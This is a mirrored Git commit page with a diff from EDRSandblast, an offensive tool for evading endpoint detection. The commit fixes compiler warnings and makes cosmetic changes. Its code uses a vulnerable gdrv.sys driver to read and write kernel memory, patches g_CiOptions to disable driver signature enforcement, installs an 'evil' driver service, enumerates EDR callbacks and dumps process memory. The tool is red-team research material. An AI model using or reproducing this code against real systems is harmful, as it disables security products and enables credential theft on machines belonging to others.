Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-09 00:47:16 +00:00
Code Issues Packages Projects Releases Wiki Activity

cosmetic changes & compiler warnings fixes

Browse Source
This commit is contained in:
Maxime Meignan
2023-10-09 14:57:49 +02:00
parent 43cea1f08b
commit 0b0086ea92
7 changed files with 28 additions and 26 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/Drivers/DriverGDRV.c
+5 -5
View File
@@ -19,7 +19,7 @@
#endif
/*
* "gdrv.sys" (SHA256: xxx)
* "gdrv.sys" (SHA256: 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427)
*/
struct GDRV_MEMORY_READ {
@@ -75,8 +75,8 @@ VOID ReadMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
//copy Size bytes from Src to Dest
struct GDRV_MEMORY_READ ReadCommand = { 0 };
ReadCommand.Src = Address;
ReadCommand.Dst = Buffer;
ReadCommand.ReadSize = Size;
ReadCommand.Dst = (DWORD64) Buffer;
ReadCommand.ReadSize = (DWORD) Size;
DWORD BytesReturned=0;
DeviceIoControl(GetDriverHandle_GDRV(),
@@ -104,9 +104,9 @@ VOID WriteMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
}
//copy Size bytes from Dest to Src
struct GDRV_MEMORY_WRITE WriteCommand = { 0 };
WriteCommand.Src = Buffer;
WriteCommand.Src = (DWORD64) Buffer;
WriteCommand.Dst = Address;
WriteCommand.WriteSize = Size;
WriteCommand.WriteSize = (DWORD) Size;
DWORD BytesReturned = 0;
DeviceIoControl(GetDriverHandle_GDRV(),
EDRSandblast/Includes/CiOffsets.h
+1 -1
View File
@@ -24,7 +24,7 @@ union CiOffsets {
} st;
// array version (usefull for code factoring)
DWORD64 ar[1];
DWORD64 ar[_SUPPORTED_CI_OFFSETS_END];
};
union CiOffsets g_ciOffsets;
EDRSandblast/Includes/KernelDSE.h
+1 -1
View File
@@ -8,4 +8,4 @@
BOOLEAN IsCiEnabled();
DWORD64 FindCIBaseAddress(BOOL verbose);
BOOL patch_gCiOptions(PVOID CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);
BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);
EDRSandblast/Includes/WdigestOffsets.h
+1 -1
View File
@@ -27,7 +27,7 @@ union WdigestOffsets {
} st;
// array version (usefull for code factoring)
DWORD64 ar[2];
DWORD64 ar[_SUPPORTED_WDIGEST_OFFSETS_END];
};
union WdigestOffsets g_wdigestOffsets;
EDRSandblast/KernellandBypass/KernelDSE.c
+7 -5
View File
@@ -5,6 +5,7 @@
//#include "ntstatus.h"
#include "KernelCallbacks.h"
#include "NtoskrnlOffsets.h"
#include "PrintFunctions.h"
#include "KernelMemoryPrimitives.h"
#include "KernelUtils.h"
#include "tchar.h"
@@ -19,7 +20,7 @@
sizeof(CiInfo),
nullptr);
if (!NT_SUCCESS(Status))
printf("[-] Failed to query code integrity status: %08X\n", Status);
printf_or_not("[-] Failed to query code integrity status: %08X\n", Status);
return (CiInfo.CodeIntegrityOptions &
(CODEINTEGRITY_OPTION_ENABLED | CODEINTEGRITY_OPTION_TESTSIGN)) == CODEINTEGRITY_OPTION_ENABLED;
@@ -43,18 +44,19 @@
if (_tcscmp(driver, L"CI.dll") == 0) {
CiBaseAddress = cbFunction - driverOffset;
if (verbose)
printf("[+] %s FOUND at %016llx - 0x%llx : 0x%llx\n", driver, cbFunction, driverOffset, CiBaseAddress);
_tprintf_or_not(TEXT("[+] %s FOUND at %016llx - 0x%llx : 0x%llx\n"), driver, cbFunction, driverOffset, CiBaseAddress);
return CiBaseAddress;
}
}
}
*/
return CiBaseAddress;
}
BOOL patch_gCiOptions(PVOID CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {
*OldCiOptionsValue = ReadMemoryDWORD64(CiVariableAddress);
BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {
*OldCiOptionsValue = ReadMemoryDWORD(CiVariableAddress);
//printf("[+KERNELDSE] The value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, *OldCiOptionsValue);
WriteMemoryDWORD64(CiVariableAddress, CiOptionsValue);
WriteMemoryDWORD(CiVariableAddress, CiOptionsValue);
//printf("[+KERNELDSE] New value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, ReadMemoryDWORD64(CiVariableAddress));
return TRUE;
}
EDRSandblast/Utils/DriverOps.c
+1 -1
View File
@@ -151,7 +151,7 @@ BOOL InstallEvilDriver(TCHAR* driverPath) {
if (status == 0x00000005) {
_putts_or_not(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?"));
}
_tprintf_or_not(TEXT("[!] The evil service should be manually deleted when you are done with it : \ncmd /c sc stop %s\ncmd /c sc delete %s\n"), GetEvilDriverServiceName());
_tprintf_or_not(TEXT("[!] The evil service should be manually deleted when you are done with it: \ncmd /c sc stop %s\ncmd /c sc delete %s\n"), GetEvilDriverServiceName(), GetEvilDriverServiceName());
return status == 0x0;
}
EDRSandblast_CLI/EDRSandblast.c
+12 -12
View File
@@ -53,11 +53,11 @@ typedef NTSTATUS(NTAPI* NtQueryInformationProcess_f)(
);
void PrintBanner() {
const TCHAR edrsandblast[] = TEXT(" ______ _____ _____ _____ _ _ _ _ \r\n | ____| __ \\| __ \\ / ____| | | | | | | | \r\n | |__ | | | | |__) | (___ __ _ _ __ __| | |__ | | __ _ ___| |_ \r\n | __| | | | | _ / \\___ \\ / _` | \'_ \\ / _` | \'_ \\| |/ _` / __| __|\r\n | |____| |__| | | \\ \\ ____) | (_| | | | | (_| | |_) | | (_| \\__ | |_ \r\n |______|_____/|_| \\_|_____/ \\__,_|_| |_|\\__,_|_.__/|_|\\__,_|___/\\__|\n");
const TCHAR edrsandblast[] = TEXT(" ______ _____ _____ _____ _ _ _ _ \r\n | ____| __ \\| __ \\ / ____| | | | | | | | \r\n | |__ | | | | |__) | (___ __ _ _ __ __| | |__ | | __ _ ___| |_ \r\n | __| | | | | _ / \\___ \\ / _` | \'_ \\ / _` | \'_ \\| |/ _` / __| __|\r\n | |____| |__| | | \\ \\ ____) | (_| | | | | (_| | |_) | | (_| \\__ | |_ \r\n |______|_____/|_| \\_|_____/ \\__,_|_| |_|\\__,_|_.__/|_|\\__,_|___/\\__|\n");
const TCHAR defcon[] = TEXT("D3FC0N 30 Edition");
const TCHAR authors[2][256] = { TEXT("Thomas DIOT (@_Qazeer)"), TEXT("Maxime MEIGNAN (@th3m4ks)") };
srand(time(NULL));
srand((unsigned int)time(NULL));
int r = rand() % 2;
_putts_or_not(edrsandblast);
@@ -334,7 +334,7 @@ Other options:\n\
}
// Command line option consistency checks.
if (startMode == none){
if (startMode == none) {
_putts_or_not(TEXT("[!] You did not provide an action to perform: audit, dump, credguard or cmd"));
return EXIT_FAILURE;
}
@@ -440,7 +440,7 @@ Other options:\n\
// Install the vulnerable driver to have read / write in Kernel memory.
LPTSTR serviceNameIfAny = NULL;
BOOL isDriverAlreadyRunning = IsDriverServiceRunning(driverPath, &serviceNameIfAny);
if (isDriverAlreadyRunning){
if (isDriverAlreadyRunning) {
_putts_or_not(TEXT("[+] Vulnerable driver is already running!\n"));
SetDriverServiceName(serviceNameIfAny);
}
@@ -477,7 +477,7 @@ Other options:\n\
isSafeToExecutePayloadKernelland = FALSE;
}
_putts_or_not(TEXT(""));
_putts_or_not(TEXT("[+] Checking if EDR callbacks are registered on processes and threads handle creation/duplication..."));
foundObjectCallbacks = EnumEDRProcessAndThreadObjectsCallbacks(foundEDRDrivers);
_tprintf_or_not(TEXT("[+] [ObjectCallblacks]\tObject callbacks are %s !\n"), foundObjectCallbacks ? TEXT("present") : TEXT("not found"));
@@ -571,10 +571,10 @@ Other options:\n\
pThreatArguments[1] = outputPath;
if (directSyscalls) {
hThread = CreateThread(NULL, 0, SandMiniDumpWriteDumpFromThread, (PVOID) pThreatArguments, 0, NULL);
hThread = CreateThread(NULL, 0, SandMiniDumpWriteDumpFromThread, (PVOID)pThreatArguments, 0, NULL);
}
else {
hThread = CreateThread(NULL, 0, dumpProcessFromThread, (PVOID) pThreatArguments, 0, NULL);
hThread = CreateThread(NULL, 0, dumpProcessFromThread, (PVOID)pThreatArguments, 0, NULL);
}
if (hThread) {
WaitForSingleObject(hThread, INFINITE);
@@ -722,14 +722,14 @@ Other options:\n\
if (kernelMode) {
DWORD64 CiBaseAddress = 0;
DWORD64 g_CiOptionsAddress = 0;
if (IsCiEnabled() | !IsCiEnabled()) // FIX IT !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
if (IsCiEnabled())
{
CiBaseAddress = FindCIBaseAddress(verbose);
if (!CiBaseAddress) {
_putts_or_not(TEXT("[-] CI base address not found !\n"));
}
else{
g_CiOptionsAddress=CiBaseAddress + g_ciOffsets.st.g_CiOptions;
else {
g_CiOptionsAddress = CiBaseAddress + g_ciOffsets.st.g_CiOptions;
if (verbose)
_tprintf_or_not(TEXT("[+] CI.dll kernel base address found at 0x%llx. The g_CiOptions is at %llx !\n"), CiBaseAddress, g_CiOptionsAddress);
if (_tcslen(unsignedDriverPath) == 0) {
@@ -741,7 +741,7 @@ Other options:\n\
return EXIT_FAILURE;
}
_putts_or_not(TEXT("[+] Using the vulnerable driver to disable CI...")); // debug print
ULONG CiOptionsValue=0;
ULONG CiOptionsValue = 0;
PULONG OldCiOptionsValue;
patch_gCiOptions(g_CiOptionsAddress, CiOptionsValue, &OldCiOptionsValue);
LPTSTR evilServiceNameIfAny = NULL;